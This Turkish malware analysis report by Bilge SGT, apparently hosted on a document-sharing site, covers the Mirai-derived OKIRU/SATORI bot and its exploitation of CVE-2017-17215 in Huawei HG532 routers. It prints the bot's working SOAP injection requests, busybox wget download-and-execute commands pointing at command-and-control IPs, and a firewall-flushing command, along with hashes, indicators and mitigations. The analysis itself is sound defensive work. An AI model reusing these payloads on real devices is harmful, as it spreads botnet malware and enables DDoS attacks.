OKIRU/SATORI BOTU İNCELEMESİ

Benzer belgeler
Google Play Zararlısı İnceleme Raporu

Trickbot Zararlı Yazılımı İnceleme Raporu

ADOBE FLASH PLAYER / CVE (Sıfırıncı Gün Zafiyeti)

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

Yeni Nesil Ağ Güvenliği

EKLER EK 12UY0106-5/A4-1:

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

Web Uygulama Güvenliği Kontrol Listesi 2010

TÜRKİYE ELEKTRONİK FON ALIM SATIM PLATFORMU WEB SERVİS İŞLEMLERİ

YENİ NESİL SİBER GÜVENLİK OPERASYON MERKEZİ (SGOM) Koruma, Tespit, Müdahale ve Tahmin. BARİKAT BİLİŞİM GÜVENLİĞİ Murat Hüseyin Candan Genel Müdür

Kurumsal Güvenlik ve Web Filtreleme

NETFİLTER VE LİNUX TABANLI BİR FİREBOX TASARIMI

Kurumsal Güvenlik ve Web Filtreleme

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

Web Servis-Web Sitesi Bağlantısı

Internet Nedir? Devlet Kurumları. Internet Servis Sağlayıcılar. Lokal Ağ. Eğitim Kurumları. Kişisel Bilgisayar. Dizüstü Bilgisayar.

FTP ve Güvenlik Duvarları

Gökhan AKIN. ĐTÜ/BĐDB Ağ Grubu Başkanı ULAK-CSIRT Güvenlik Grubu Üyesi.

Firewall Log Server. Kurulum Kılavuzu

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Mobil Cihazlardan Web Servis Sunumu

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

SİBER SUÇLARA KARŞI SİBER ZEKA

Siber saldırıda ev aletleri de kullanılmış

VPN NEDIR? NASıL KULLANıLıR?

VERİSİGN DAĞITILMIŞ HİZMET REDDİ TREND RAPORU SAYI 'ÜN 1. ÇEYREĞİ

Icerik filtreleme sistemlerini atlatmak icin kullanacağımız yöntem SSH Tünelleme(SSH in SOCKS proxy ozelligini kullanacagiz).

BioAffix Ones Technology nin tescilli markasıdır.

Red Alert 2.0 Truva Atı ve Bankacılık Zararlısı İnceleme Raporu

5651 ve 5070 Sayılı Kanun Tanımlar Yükümlülükler ve Sorumluluklar Logix v2.3 Firewall. Rekare Bilgi Teknolojileri

Hızlı Başlangıç Kılavuzu

ĐZLEME(MONITORING) HĐZMETĐ

DTÜ BİLGİ İŞLEM DAİRE

BioAffix Ones Technology nin tescilli markasıdır.

Venatron Enterprise Security Services W: P: M:

ÖRÜN (WEB) GÜVENLİĞİ. Hazırlayan: Arda Balkanay

Exobot Bankacılık Zararlısı İnceleme Raporu

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

T.C. SAĞLIK BAKANLIĞI ĐLAÇ VE ECZACILIK GENEL MÜDÜRLÜĞÜ

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir.

ERİŞİM ENGELLEME DOS VE DDOS:

AĞ KURULUMU ANA MAKİNA İÇİN:

Tarih Saat Modül Adı Öğretim Üyesi. 01/05/2018 Salı 3 Bilgisayar Bilimlerine Giriş Doç. Dr. Hacer Karacan

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

HP PROCURVE SWITCHLERDE 802.1X KİMLİK DOĞRULAMA KONFİGÜRASYONU. Levent Gönenç GÜLSOY

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

KKB Kredi Kayıt Bürosu

05 - Veritabanı Sızma Testleri

Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır?

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ.

HTTP. (Hyper Text Transfer Protocol)

SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

PHP (II) Formlar. Dosya İşlemleri. 2002, Sanem SARIEL PHP Ders Notları 2 1. Formlar

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?

Aktif Dizin Logon/Logoff Script Ayarları Versiyon

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU

SİBER ESPİYONAJ FAALİYETLERİ VE TÜRKİYE

T.C. TARIM ve KÖYİŞLERİ BAKANLIĞI BİLGİ VE İLETİŞİM SİSTEMLERİ KULLANIMININ DÜZENLENMESİNE İLİŞKİN YÖNERGE BİRİNCİ BÖLÜM GENEL HÜKÜMLER

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

Mobil Güvenlik ve Denetim

BİLGİ GÜVENLİĞİ BİLİNÇLENDİRME EĞİTİMİ

Berqnet Sürüm Notları Sürüm 4.1.0

5651 Sayılı Kanun Hakkında Kanunla ilgili detay bilgiler

SMTP Protokolü ve Spam Mail Problemi

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP

MaestroPanel Kurulum

Elbistan Meslek Yüksek Okulu GÜZ Yarıyılı Ara Salı, Çarşamba Öğr. Gör. Murat KEÇECĠOĞLU

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI


MutluSantral API Dokümanı. Versiyon 1.0.1

Adli Analiz İşlemlerine Başlamak

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy

Seo Eğitimi (300 Sattlik Eğitim) Seo. Genel Amaçları. Seo da Kullanılan Terimler. Nedir? Nasıl Çalışır? Nasıl Olmalıdır?

Kurumsal Ağlarda Web Sistem Güvenliği

YAZILIM GÜVENLİK TESTLERİ. H A L D U N T E R A M A N h a l d u n t e r a m a g m a i l. c o m

E-postaya Tarama Hızlı Kurulum Kılavuzu

Siber Suçlarla Mücadele Şube Müdürlüğümüz, ilimiz Derince ilçesinde bulunan İl Emniyet Müdürlüğü yerleşkesinde faaliyet göstermektedir.

AHTAPOT Güvenlik Duvarı Yönetim Sistemi Kullanımı

AHTAPOT Merkezi Güvenlik Duvarı Yönetim Sistemi Kontrol Paneli

Vitel. Manage Engine. Opmanager Yönetici Özeti

Wi-Fi Direct Rehberi. Wi-Fi Direct ile Kolay Kurulum. Sorun Giderme. Appendix

WebSiteDefender ile Web Uygulama Güvenliği

Geofacets EĞİTİM & ARAŞTIRMA

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006

GLOBAL SİBER ATAK GÖRSELLEŞTİRME SİSTEMLERİ

İnternet ve İnternet Tarayıcıları BİLGİ VE İLETİŞİM TEKNOLOJİSİ DERS NOTU - 2

Bilgisayar Programalamaya Giriş

Siber Güvenlik Basın Buluşması. C.Müjdat Altay 15 Haziran 2015

VS-858(Veri Toplama Terminali)

HAKKIMIZDA. Misyonumuz; Vizyonumuz;

Ağ Trafik ve Forensik Analizi

Saldırgan Yaklaşımı. Nebi Şenol YILMAZ Danışman / Yönetici Ortak senol.yilmaz@secrove.com. Secrove Information Security Consulting

NicProxy Registrar WHMCS Modül Kurulumu Versiyon 1.0

Transkript:

OKIRU/SATORI BOTU İNCELEMESİ

Bilge SGT Bilge SGT, teknoloji entegrasyonu ve siber güvenlik alanında faaliyet göstermektedir. Özellikle kamu kurumları, finans kuruluşları ve kritik altyapılara yönelik hizmetler vermekte olan Bilge SGT, kurumların özel ihtiyaçları doğrultusunda uçtan uca teknoloji çözümleri sunmaktadır. Ağ teknolojileri, sunucu ve sistem çözümleri, güvenli veri depolama sistemleri, iletişim şifreleme, ağ trafiği optimizasyonu çözümleri sunabilen Bilge SGT, mevcut çözümleri özelleştirerek kurumların verimliliğini ve yönetim kabiliyetlerini arttırmayı hedeflemektedir. Bilge SOME Bilge SOME, kurumların siber güvenlik olayları anında ihtiyaç duydukları güvenilir uzman desteğini sağlamak için Bilge SGT tarafından kurulmuş siber güvenlik ekibidir. Sistemleriniz, iletişim altyapınız, uygulamalarınız saldırı altında olduğunda, bilgilerinizin sızdırılıp ifşaa edilme riski ile karşılaştığınızda; Bilge SOME acil müdahale ekibiyle size destek olmak ve kurumunuzu siber saldırılara karşı hazırlamak altyapınızı iyileştirir, teknik ekiplerinizi eğitir.

RAPOR HAKKINDA 30 Kasım 2017 tarihinde Huawei HG532 model yönlendirici modem cihazlarında keşfedilen güvenlik zafiyeti, teknik detayları paylaşılmamasına rağmen saldırı amaçlı kullanılmaya başlanmıştır. Raporda incelenen OKIRU/SATORI Bot u, 2016 yılı sonunda yayılmaya başlayan ve dünya genelinde birçok cihazı etkileyerek çok kuvvetli DDoS saldırılarına sebep olan Mirai Bot u temel alınarak geliştirilmiştir. Mirai botunda değişiklik yapılarak, Huawei cihazlardaki bu güvenlik açığını kullanıp zararlı yazılımın yayılmasını sağlayacak hale getirilmiş, yayılırken kullandığı dosya adı olan okiru dan yola çıkılarak ismi OKIRU/SATORI olarak tanımlanmıştır. Zararlı yazılımın kısa süre içerisinde Amerika Birleşik Devletleri, Orta ve Güney Amerika ülkeler, Kuzey Afrika ülkeleri, Japonya, Orta Avrupa ve Türkiye de etkili olduğu gözlemlenmiştir. OKIRU/SATORI nin atası olan Mirai Bot ağı kullanılarak çeşitli web sitelerine saldırılar gerçekleştirilmişti. İnternetin en büyük DNS hizmet sağlayıcılarından birisi olan DYN şirketine gerçekleştirilen saldırı Twitter, Spotify, Reddit, Paypal, Netflix gibi küresel bilinirliği olan hizmet ve içerik sağlayıcıların servislerini 2016 yılı sonu ve 2017 yılı başlarında kesintiye uğratmıştı. Analiz çalışmamızda OKIRU/SATORI Botunun binary dosyası üzerinden hızlı inceleme yaparak nasıl çalıştığı, nasıl yayıldığı ve ne tedbir alınması gerektiğini anlamaya yönelik teknik bir değerlendirme sunulmaktadır. Bilge SGT Sayfa 3 / 12

OKIRU/SATORI BOT NEDİR, NASIL YAYILIR OKIRU/SATORI solucanu, internete bağlı cihazları ve modemleri hedef alan Mirai Botunun varyantıdır. Zarrlı yazılım, baz aldığı Mirai nin kullandığı basit kullanıcı adı/parola ikilileri yerine Huawei HG532 model yönlendirici modem aygıtlarında yakın zamanda tespit edilmiş olan CVE-2017-17215 kimlik numaralı güvenlik zafiyetini kullanarak enfekte olmakta ve yayılmaktadır. Zararlı yazılım yayılmak için Huawei HG532 model yönlendirici modem aygıtların TR- 064 protokolü implementasyonundaki yazılım hatasını kullanmaktadır. TCP/37215 ve TCP/52869 portunda hizmet veren UPnP (Universal Plag and Play) servisinin girdi doğrulamaları eksik veya hatalı yapması sonucu, komut (Shell) satırında çalıştırılabilen özel karakterler olan $( ) karakterleri isteklere enjekte edilebilmekte ve böylelikle cihazların komut satırında yönetici yetkileri ile komut çalıştırılabilmektedir. Komut satırında yapılacak işlemler, gerçekleştirilen istek içerisindeki NewStatusURL ve NewDownloadURL direktiflerinin içerisine enjekte edilmektedir. Bu sayede saldırgan sadece Mirati/Satori botunun URL ini hedef sisteme vererek botun cihaz tarafından indirilerek çalıştırılmasını sağlayabilmektedir. Enjekte ederek komut satırında busybox içerisinde çalıştırdığı komut şu şekildedir; busybox wget -g 172.93.97.219 -l /tmp/rsh -r /okiru.mips ;chmod +x /tmp/rsh ;/tmp/rsh Bilge SGT Sayfa 4 / 12

TEKNİK DETAYLAR Zararlı yazılımın farklı platformlara yayılmak için kullandığı binary dosyaların adları ve hash değerleri; Hash Değeri Binary Adı df9c48e8bc7e7371b4744a2ef8b83ddf a7922bce9bb0cf58f305d17ccbc78d98 37b7c9831334de97c762dff7a1ba7b3f e1411cc1726afe6fb8d09099c5fb2fa6 cd4de0ae80a6f11bca8bec7b590e5832 7de55e697cd7e136dbb82b0713a01710 797458f9cee3d50e8f651eabc6ba6031 353d36ad621e350f6fce7a48e598662b 8db073743319c8fca5d4596a7a8f9931 0a8efeb4cb15c5b599e0d4fb9faba37d 08d48000a47af6f173eba6bb16265670 e9038f7f9c957a4e1c6fc8489994add4 b okiru.mipsel okiru.arm7 okiru.x86 okiru.x86 okiru.mips okiru.m68k okiru.arm okiru.sparc okiru.powerpc okiru.x86_64 okiru.superh Zararlı yazılımın komuta kontrolü için kullanılan sunucuların IP adresli listesi C&C IP Adresleri 95.211.123.69 (Güncel Sunucu) 77.73.69.177 172.93.97.219 165.227.220.202 198.7.59.177 Bilge SGT Sayfa 5 / 12

Zararlı yazılımın binary dosyası incelendiğinde enfekte olduktan sonra cihaz üzerindeki güvenlik duvarı kurallarını kaldırmaktadır; iptables -F Yine incelemede enfekte olduğu sisteme uygun binary dosyanın wget ile indirildiğini ve indirme yerindeki tam dizini tespit etmek mümkündür; /bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s;./%s; >%s OKIRU/SATORI nin diğer aygıtlara yayılmak için cihazlara gönderdiği HTTP isteklerinin detayları şu şekildedir; POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 603 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive Bilge SGT Sayfa 6 / 12

<?xml version="1.0"?><s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:addportma pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var/;cp $SHELL c;>c`</newinternalclient><newenabled>1</newenabled><newportmappingdescription >syncthing</newportmappingdescription><newleaseduration>0</newleaseduration>< /u:addportmapping></s:body></s:envelope> POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 630 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive <?xml version="1.0"?><s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:addportma pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var/;wget http://%d.%d.%d.%d/rt.mips - O -> c` </NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>sync thing</newportmappingdescription><newleaseduration>0</newleaseduration></u:ad dportmapping></s:body></s:envelope> Bilge SGT Sayfa 7 / 12

POST /picdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 602 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:wanipconnection:1#addportmapping Accept: */* User-Agent: Hello-World Connection: keep-alive <?xml version="1.0"?><s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:addportma pping xmlns:u="urn:schemas-upnporg:service:wanipconnection:1"><newremotehost></newremotehost><newexternalp ort>47450</newexternalport><newprotocol>tcp</newprotocol><newinternalport>443 82</NewInternalPort><NewInternalClient>`cd /var;chmod +x c;./c`</newinternalclient><newenabled>1</newenabled><newportmappingdescription >syncthing</newportmappingdescription><newleaseduration>0</newleaseduration>< /u:addportmapping></s:body></s:envelope> POST /ctrlt/deviceupgrade_1 HTTP/1.1 Host: %s:37215 User-Agent: Hello-World Content-Length: 430 Connection: keep-alive Accept: */* Accept-Encoding: gzip, deflate Bilge SGT Sayfa 8 / 12

Authorization: Digest username="dslf-config", realm="huaweihomegateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/deviceupgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="md5", qop="auth", nc=00000001, cnonce="248d1a2560100669" <?xml version="1.0"?> <s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:body><u:upgrade xmlns:u="urn:schemas-upnp-org:service:wanpppconnection:1"> <NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</newstatusurl> <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL> </u:upgrade> </s:body> </s:envelope> İndikatör olarak kullanılabilecek veriler şu şekildedir; İsteklerin hedef portu TCP/52869 veya TCP/37215 İstekler HTTP protokolü üzerinden ve SSL kullanılmadan SOAP istekleridir Isteklerin hedef dosyası /picdesc.xml veya /ctrlt/deviceupgrade_1 İsteklerin User-Agent değeri Hello-World İstek gövdesinde (request body) busybox wget veya chmod veya $SHELL dizileri bulunması Enfekte olan cihazlar komuta kontrol sunucusuna TCP/7645 portuna bağlanmaya çalışmaktadır. Dinamik analiz sistemlerini ve kum havuzlarını yanıltmak amacıyla ortam kontrollerini yaptıktan sonra 109.206.187.130:23 adresine bağlantı isteği gönderiyor gibi davranmaktadır. Bilge SGT Sayfa 9 / 12

SALDIRGAN HAKKINDA BİLGİ Saldırı gelmişmiş bir güvenlik zafiyeti tekniği kullanıyor olsa da, saldırganın internet üzerindeki güvenlik forumlarında Mirai Botu nu nasıl modifiye edebileceğini soran Nexus Zeta takma ismini kullanan amatör bir korsan olduğu tespit edilmiştir. Resim 1 HackForums da ARMv6b Derleyici Sorusu Resim 2 - "nexus_zeta" Twitter Hesabı Resim 3 - "NexusZeta" GitHub Hesabı Bilge SGT Sayfa 10 / 12

NASIL TEDBİR ALIRIM? Ağınıza doğru trafiklerde TCP/52869 ve TCP/37215 portlarına yönelik istekleri engelleyin. Ağınızdan dışarıya doğru komuta kontrol sunucusu listesinde verilen IP adreslerine doğru trafikleri engelleyin. Huawei HG532 model yönlendirici modem kullanıyorsanız üreticinizin yamalarını ve güncel firmware sürümünü modeminize yükleyin. Huawei HG532 model yönlendirici modem kullanıyorsanız cihaz üzerindeki güvenlik duvarından dışarıdan gelen TCP/52869 ve TCP/37215 portlarına yönelik istekleri engelleyin. Uzaktan yönetim arabirimlerini WAN ara yüzlerinden erişime mutlaka kapatın. Bilge SGT Sayfa 11 / 12

Kurumsal Siber Olaylara Müdahale Ekipleri (SOME) eğitimi ve siber güvenlik operasyon merkezi çalışmalarımız hakkında bilgi almak için bizlerle irtibata geçebilirsiniz. +90 (312) 240 32 36 info@bilgesgt.com Bilge SGT Sayfa 12 / 12

2026 © DocPlayer.biz.tr Gizlilik Politikası | Hizmet koşulları | Geri bildirim